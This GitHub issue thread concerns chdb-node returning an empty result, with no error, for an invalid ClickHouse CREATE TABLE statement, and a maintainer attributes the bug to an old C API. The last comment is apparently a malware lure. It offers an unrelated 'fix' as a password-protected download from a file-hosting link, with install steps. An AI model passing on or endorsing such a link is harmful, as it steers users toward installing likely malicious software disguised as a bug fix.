### ISSUE TITLE
Missing error response

### ISSUE THREAD

**Issue by ceckoslab** [chdb-io/chdb-node#13]
I've been playing with **chdb** and I was experimenting with creating tables.

I did a mistake while creating the following table:
```
const createSql = `CREATE TABLE IF NOT EXISTS invalid_create_table (id Int32)
ENGINE = MergeTree()
PARTITION BY (id)
SETTINGS index_granularity = 8192;`

const res = session.query(createSql);
console.log(res);
```

The `console.log(res);` returns empty result and not indication for an error.

Where the ClickHouse playground returns:
```
Code: 36. DB::Exception: You must provide an ORDER BY or PRIMARY KEY expression in the table definition. If you don't want this table to be sorted, use ORDER BY/PRIMARY KEY (). Otherwise, you can use the setting 'create_table_empty_primary_key_by_default' to automatically add an empty primary key to the table definition. (BAD_ARGUMENTS) (version 24.4.4.113 (official build))
```

Am I doing something wrong is is this a real bug/issue?

**Comment by auxten** [comment]
Sorry, it's a chdb-node bug issue.
It's still using the old chdb C API, I will update it to the v2 API to fix that this week.

**Comment by ceckoslab** [comment]
Also for the record, I am running it on Mac M2.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
